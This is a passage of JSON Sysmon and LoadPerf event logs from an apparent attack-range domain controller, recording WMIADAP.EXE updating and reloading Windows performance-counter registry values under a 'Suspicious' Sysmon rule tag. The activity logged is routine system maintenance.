RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter","Details":"DWORD (0x00006322)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help\r\nDetails: DWORD (0x00006323)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help","Details":"DWORD (0x00006323)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\PerfIniFile\r\nDetails: WmiApRpl.ini","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\PerfIniFile","Details":"WmiApRpl.ini","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating\r\nDetails: WmiApRpl","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.762","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Details":"WmiApRpl","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter\r\nDetails: DWORD (0x000063ca)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter","Details":"DWORD (0x000063ca)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help\r\nDetails: DWORD (0x000063cb)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help","Details":"DWORD (0x000063cb)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter\r\nDetails: DWORD (0x000063ca)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","Details":"DWORD (0x000063ca)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help\r\nDetails: DWORD (0x000063cb)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","Details":"DWORD (0x000063cb)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter\r\nDetails: DWORD (0x00006324)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","Details":"DWORD (0x00006324)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help\r\nDetails: DWORD (0x00006325)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","Details":"DWORD (0x00006325)","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List\r\nDetails: 25380 25386 25396 25406 25426 25470 25480 25518 25524 25540","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","Details":"25380 25386 25396 25406 25426 25470 25480 25518 25524 25540","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 07:57:18.840\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.840","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1001,"SourceName":"Microsoft-Windows-LoadPerf","ProviderGuid":"{122EE297-BB47-41AE-B265-1CA8D1886D40}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12118,"ProcessID":4800,"ThreadID":2408,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Performance counters for the WmiApRpl (WmiApRpl) service were removed successfully. The Record Data contains the new values of the system Last Counter and Last Help registry entries.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:57:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1000,"SourceName":"Microsoft-Windows-LoadPerf","ProviderGuid":"{122EE297-BB47-41AE-B265-1CA8D1886D40}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12119,"ProcessID":4800,"ThreadID":2408,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Performance counters for the WmiApRpl (WmiApRpl) service were loaded successfully. The Record Data in the data section contains the new index values assigned to this service.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:57:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Data\r\nDetails: Binary Data","Category":"Registry value set (rule: 